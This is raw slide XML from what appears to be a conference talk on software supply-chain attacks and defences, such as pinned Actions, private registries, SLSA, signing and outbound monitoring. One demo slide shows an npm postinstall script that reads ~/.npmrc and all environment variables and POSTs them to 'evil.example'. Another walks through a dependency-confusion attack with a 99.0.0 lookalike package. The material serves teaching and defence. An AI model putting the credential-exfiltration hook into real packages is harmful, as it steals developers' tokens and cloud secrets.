          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1216152" y="2642616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Pin Actions to a commit SHA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Not to a tag — a tag can be moved under you.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="145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0A5FCD8-35FE-7BD6-56FC-5DA1A45D5A82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="3447288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7A4A751-50DF-7DB6-EA4D-6D510419CFA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1216152" y="333756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Private registry / proxy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Artifactory or Nexus + scoped packages beat dependency confusion.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="145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9674082D-C0AE-FA25-C5DE-B9F6A7D136CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4142232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61DC2810-2748-A8A1-4D6B-D06AB4EBCC47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1216152" y="4032504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Cooldown on new versions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e.g. pnpm minimumReleaseAge — most malicious versions are caught within hours.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="145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4263BB05-852F-3308-A0DF-163AF8B74BEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4837176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3A8A49BE-AC91-96D3-A8C1-2E5CC70CDA92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1216152" y="4727448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Score before you trust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OpenSSF Scorecard, Socket.dev, and --ignore-scripts where you can.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3517986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FF2D56CB-252F-E299-46D9-A9694B55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1FDA0F7-FB6F-CFD5-CCA7-B226931B4BC9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Defense — as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producer of software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FAD0D68-1262-09C0-9072-76AF94A5E46D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SHIP THE CODE — PROVE WHAT YOU SHIPPED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="d">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FFBD87A-F8D1-4C45-4B00-C765B16AFDD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1709928"/>
            <a:ext cx="11064240" cy="3840480"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2143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56244816-5BA3-8630-FB51-95CFCEC548EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2057400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43592BF8-EDC0-13F7-1FCC-450C7C50F8C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1216152" y="1947672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SLSA framework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Levels for how trustworthy your build process is.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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2D1D80EE-0C81-E916-1711-829CB53B2D89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="275234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1BABB61-0F2B-9FB8-1CB4-450CEDAAE0D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1216152" y="2642616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Sign + provenance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Sigstore / cosign, npm provenance, trusted publishing via OIDC instead of long-lived tokens.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="145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9C272AE-1935-2A44-6F0D-5EB7BDB7FD20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="3447288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10266F0-1C40-0469-3576-A5E7D375D8A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1216152" y="333756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Hardened, ephemeral builds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Throwaway build environments and reproducible builds.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="145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53B7E70-6A5F-150D-D603-F500897418A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4142232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0B271EA-DEF0-F1DD-C009-7972D44384A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1216152" y="4032504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2FA / passkeys for maintainers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Non-negotiable — account takeover is the cheapest attack there is.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2632261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006D1F15-ABB9-B75A-3E83-D914BB3E8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EEA09DC-0071-6378-13A8-032B74D1633F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Defense — as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an organization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CEB1180-564D-93ED-297E-BD596C0297A4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“TRUSTED VENDOR” MUST NOT MEAN “TRUSTED TRAFFIC”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="d">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D307EB13-C0BA-C115-7AE3-00DF6D2619F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1709928"/>
            <a:ext cx="11064240" cy="3840480"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2143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D9D79410-F0EE-35F0-DF84-F300D44D2301}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2057400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9071249-1BD1-95B8-5D73-ECA85C8208F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1216152" y="1947672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 risk management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Security questionnaires and review before you onboard a vendor.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="145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6BA1572-0BFA-B3BD-F5A0-7DC5F8139EDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="275234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A8F860B-727C-41F8-219C-CB88D2CD7CC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1216152" y="2642616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Least privilege + segmentation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Vendor software gets only what it needs — not the whole network.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="145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70613DE-C2D7-50A7-31D5-E16DE280DC2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="3447288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2819345-ACB3-CEC7-7F8B-8FB686440383}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1216152" y="3337560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Monitor outbound traffic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SUNBURST could have been caught on its DNS anomalies.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0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EC59206D-FC0E-8794-30D3-6A5DF0013508}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4142232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2FBB8ABE-4957-4B65-D633-8A7FAAA683DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1216152" y="4032504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Zero Trust mindset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trusted supplier is not a trusted packet.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="145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E68EFFC1-C5E0-25E8-C7FF-A2B813226F1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4837176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D3521FD-43FA-95A1-8B39-88501C708595}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1216152" y="4727448"/>
            <a:ext cx="99669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IR plan with a “compromised vendor” scenario  —  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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Rehearse it before you need it.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1100484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66B87ED0-2255-A027-CDF2-A68A48FA9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8F6EE01-D946-D322-2716-92CE32DEA3F7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Demo 1</a:t>
            </a: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 — a postinstall that reads your secrets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6678A0E-F58D-CBA1-8978-CD54E6A95E41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 RUN NPM INSTALL. IT RUNS THEIR CODE.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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93A8A38-5817-B903-DDA1-66CF2777B302}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1709928"/>
            <a:ext cx="7315200" cy="3840480"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1429"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0B1020"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="2A3566"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="152400" dist="50800" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="05081A">
                <a:alpha val="50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AF7815D-0CCC-49BF-FE94-CD210B3FAB7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="749808" y="1892808"/>
            <a:ext cx="109728" cy="109728"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF5F56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22BE89DB-E32A-4423-D1B3-861CE0877739}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="987552" y="1892808"/>
            <a:ext cx="109728" cy="109728"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFBD2E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44C82A4-F645-9911-7372-C58FB8B3AF82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1225296" y="1892808"/>
            <a:ext cx="109728" cy="109728"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="27C93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052347D-E606-95D6-6B9A-B50CF9BB5D38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="2167128"/>
            <a:ext cx="67665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package.json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"scripts": { </a:t>
            </a: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"postinstall"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: </a:t>
            </a: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"node steal.js"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}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steal.js  — runs automatically on install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fs = </a:t>
            </a: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require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('fs'), os = </a:t>
            </a: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require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('os')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home = os.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F6C6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homedir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()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1) the npm auth token, in plain text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npmrc = fs.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F6C6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readFileSync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(home+</a:t>
            </a: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'/.npmrc'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</a:t>
            </a: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'utf8'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2) every secret the CI kindly exported for us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const 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env = JSON.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F6C6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stringify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(process.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6B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env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)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F6C65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fetch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(</a:t>
            </a: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'https://evil.example/collect'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{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 method:</a:t>
            </a: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'POST'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, body: npmrc + env </a:t>
            </a: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// exfiltrated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})</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="co">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A229B8A0-C3AB-011C-DE6C-602BD100BE7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8092440" y="1709928"/>
            <a:ext cx="3520440" cy="3840480"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2338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3949274-7561-3B39-8A18-001AB0027CEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8321040" y="182880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6B6B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What it walks away with</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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E08E9BC0-E529-AEED-5119-E74D6193CA33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8321040" y="233172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~/.npmrc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="13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7D95C3CD-B29E-A354-728C-011517832B3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8321040" y="2606040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//registry auth token</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty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3D6DBF6-9E68-94D3-4F97-CBC13A64627B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8321040" y="3044952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NPM_TOKEN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="135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7D0546C-46AF-4B7E-5C3F-F21AB87CAC1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8321040" y="331927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CI publish rights</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="115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854276A0-309B-A343-1121-2A9C1A30AD1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8321040" y="3758184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AWS_SECRET…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty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41BC5894-E01F-AA1E-8E2F-9981458C7A27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8321040" y="4032504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cloud credentials</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="115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DE238C97-5C41-3FCE-FD8D-D6C0A365B26D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8321040" y="447141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DB_PASSWORD</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty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CCCD226-3928-1811-6EA2-E59DD97B5517}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8321040" y="4745736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your database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="11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1A2B3CB-F6C0-9305-2C21-0BB182A48762}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8321040" y="5120640"/>
            <a:ext cx="3108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All sitting in plain text.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439009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D1BB13E7-93B3-25E3-69C1-489309088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5A47A491-B070-12E7-85EC-E294BE2192F1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Demo 2 —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dependency confusion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="30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3A9CA41-A275-AFDA-D39A-6818D327C631}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1389888" y="1298448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LOCAL VERDACCIO REGISTRY · THE PUBLIC NAME WINS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="setup">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8539324-C140-EA0D-7341-FED7BF2F1F94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1709928"/>
            <a:ext cx="5349240" cy="3840480"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2143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A93F3F5-E022-2971-9042-2A1777A3E7E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="1828800"/>
            <a:ext cx="4846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The setup</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty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EC21ACBF-7126-22E9-5374-A18982FB2E65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868680" y="2331720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3F9FAD47-D8DD-3AC3-C663-19A8D2D43ED5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868680" y="23317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4708D1E-0E4B-55E8-90A8-7695C08EF5D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1463040" y="228600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Internal package @acme/utils lives only in our private registry</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1280"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9155AF1C-34E7-E481-5C5F-202E0BC460FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868680" y="3154680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3C1F807-48CF-E23A-E3F7-1847376C96F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868680" y="31546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D2B8C0F-1619-446F-57DA-8361505BF79B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1463040" y="310896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Attacker publishes acme-utils (or same name, higher version) to the public registry</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="128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F477900-EA5F-F573-EC4D-E4E38BC7A305}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868680" y="3977640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8068772-46CE-7955-2EFD-DE69F56045C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868680" y="3977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AB86844A-CF7E-84E3-5AFB-FECABBB9E321}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1463040" y="393192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 misconfigured resolver prefers the public, higher-versioned package</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1280" dirty="0"/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C0F7A40E-FBD0-1E48-7761-300746B83E03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868680" y="4800600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377673DE-24F8-820E-D66A-E83685827518}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868680" y="4800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207CBD21-3B11-360D-4038-CF2DD10F2834}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1463040" y="475488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8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Its postinstall runs — inside our build</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="128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C2D5ED45-AFD3-3C44-1832-39FF0FE6577E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6126480" y="1709928"/>
            <a:ext cx="5486400" cy="3840480"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1429"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0B1020"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="2A3566"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="152400" dist="50800" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="05081A">
                <a:alpha val="50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4BDE1FA5-EA68-FE98-D546-D5C48C5E7C69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6327648" y="1892808"/>
            <a:ext cx="109728" cy="109728"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF5F56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C1524FAE-73A0-6410-FDFD-1A18A2D08DE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6565392" y="1892808"/>
            <a:ext cx="109728" cy="109728"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFBD2E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3048D5F5-CC19-1E1B-081F-A218756140CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6803136" y="1892808"/>
            <a:ext cx="109728" cy="109728"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="27C93F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36081AA9-5392-E493-C0D3-A83C89B9E88D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="2167128"/>
            <a:ext cx="493776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publish the public lookalike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npm publish </a:t>
            </a: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--registry https://registry.npmjs.org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victim build, no scope lock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npm install acme-utils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acme-utils@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6B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99.0.0</a:t>
            </a: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postinstall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C9D6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&gt; node </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6B6B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pwn.js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[+] running inside the build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[+] reading CI secrets…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8A93B2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# the fix:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="108000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="72C9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scope + private registry + lockfile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31289088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>
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7E912FB-22B3-9F54-4A91-B534D733B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54740DAB-D138-005D-CCB6-D5D72AEBB0EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="45720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Five things you can do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1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tomorrow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="todo">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEBD22EF-7AD5-CF78-7058-FF2E3409255C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
